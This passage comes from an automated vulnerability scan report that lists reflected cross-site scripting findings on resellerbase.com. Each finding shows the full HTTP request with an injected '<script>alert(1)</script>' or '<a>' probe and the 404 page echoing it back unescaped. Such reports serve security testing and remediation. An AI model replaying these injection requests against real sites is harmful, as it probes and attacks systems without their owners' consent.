<p>The requested URL /detail/38/themes/kosmos/search.php8173a<script>alert(1)</script>9d02acca01c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2623. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cba75<a>5925c223941 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Searchcba75<a>5925c223941&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Searchcba75<a>5925c223941&opt=2 was not found on this server.</p>
...[SNIP]...

2.2624. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 81edb<a>a4a4ae2ee5c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/search.php?keyword=search...81edb<a>a4a4ae2ee5c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/search.php?keyword=search...81edb<a>a4a4ae2ee5c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2625. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67e6f<script>alert(1)</script>e0e4d85316e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&67e6f<script>alert(1)</script>e0e4d85316e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&67e6f<script>alert(1)</script>e0e4d85316e=1 was not found on this server.</p>
...[SNIP]...

2.2626. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload bc496<a>2bd36008879 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2bc496<a>2bd36008879 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2bc496<a>2bd36008879 was not found on this server.</p>
...[SNIP]...

2.2627. http://www.resellerbase.com/detail/38/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ffb36<script>alert(1)</script>08f42f31406 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailffb36<script>alert(1)</script>08f42f31406/38/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailffb36<script>alert(1)</script>08f42f31406/38/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2628. http://www.resellerbase.com/detail/38/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 618f6<script>alert(1)</script>ec09d31e591 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38618f6<script>alert(1)</script>ec09d31e591/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38618f6<script>alert(1)</script>ec09d31e591/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2629. http://www.resellerbase.com/detail/38/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 741b6<script>alert(1)</script>4dcd84d8ef0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes741b6<script>alert(1)</script>4dcd84d8ef0/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes741b6<script>alert(1)</script>4dcd84d8ef0/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2630. http://www.resellerbase.com/detail/38/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 529ee<script>alert(1)</script>29977845c34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/search.php529ee<script>alert(1)</script>29977845c34?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/search.php529ee<script>alert(1)</script>29977845c34?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2631. http://www.resellerbase.com/detail/38/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 31982<a>61f2b23a054 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/search.php?keyword=search...&Submit3=Search31982<a>61f2b23a054&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/search.php?keyword=search...&Submit3=Search31982<a>61f2b23a054&opt=2 was not found on this server.</p>
...[SNIP]...

2.2632. http://www.resellerbase.com/detail/38/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6f4c3<a>ecbca3941c6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/search.php?keyword=search...6f4c3<a>ecbca3941c6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/search.php?keyword=search...6f4c3<a>ecbca3941c6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2633. http://www.resellerbase.com/detail/38/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e66a2<script>alert(1)</script>17fe0773be3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/search.php?keyword=search...&Submit3=Search&opt=2&e66a2<script>alert(1)</script>17fe0773be3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/search.php?keyword=search...&Submit3=Search&opt=2&e66a2<script>alert(1)</script>17fe0773be3=1 was not found on this server.</p>
...[SNIP]...

2.2634. http://www.resellerbase.com/detail/38/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7ff65<a>d24c932093 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/search.php?keyword=search...&Submit3=Search&opt=27ff65<a>d24c932093 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/search.php?keyword=search...&Submit3=Search&opt=27ff65<a>d24c932093 was not found on this server.</p>
...[SNIP]...

2.2635. http://www.resellerbase.com/detail/38/whitelabelcash-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/whitelabelcash-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d69f7<script>alert(1)</script>52170b51c4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild69f7<script>alert(1)</script>52170b51c4c/38/whitelabelcash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild69f7<script>alert(1)</script>52170b51c4c/38/whitelabelcash-com.html was not found on this server.</p>
...[SNIP]...

2.2636. http://www.resellerbase.com/detail/38/whitelabelcash-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/whitelabelcash-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13676<a>f3261d2dcf3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/3813676<a>f3261d2dcf3/whitelabelcash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/hot.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3813676<a>f3261d2dcf3/whitelabelcash-com.html was not found on this server.</p>
...[SNIP]...

2.2637. http://www.resellerbase.com/detail/38/whitelabelcash-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/whitelabelcash-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c93bb<script>alert(1)</script>00d3722fb72 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/c93bb<script>alert(1)</script>00d3722fb72 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/c93bb<script>alert(1)</script>00d3722fb72 was not found on this server.</p>
...[SNIP]...

2.2638. http://www.resellerbase.com/detail/39/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c6b5<script>alert(1)</script>f2276c59e5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4c6b5<script>alert(1)</script>f2276c59e5e/39/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4c6b5<script>alert(1)</script>f2276c59e5e/39/ was not found on this server.</p>
...[SNIP]...

2.2639. http://www.resellerbase.com/detail/39/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 815fe<script>alert(1)</script>f2eb0264b27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39815fe<script>alert(1)</script>f2eb0264b27/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39815fe<script>alert(1)</script>f2eb0264b27/ was not found on this server.</p>
...[SNIP]...

2.2640. http://www.resellerbase.com/detail/39/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f7d77<script>alert(1)</script>9d64f826211 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/?f7d77<script>alert(1)</script>9d64f826211=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/?f7d77<script>alert(1)</script>9d64f826211=1 was not found on this server.</p>
...[SNIP]...

2.2641. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58950<script>alert(1)</script>eff6a5a8cd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail58950<script>alert(1)</script>eff6a5a8cd2/39/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

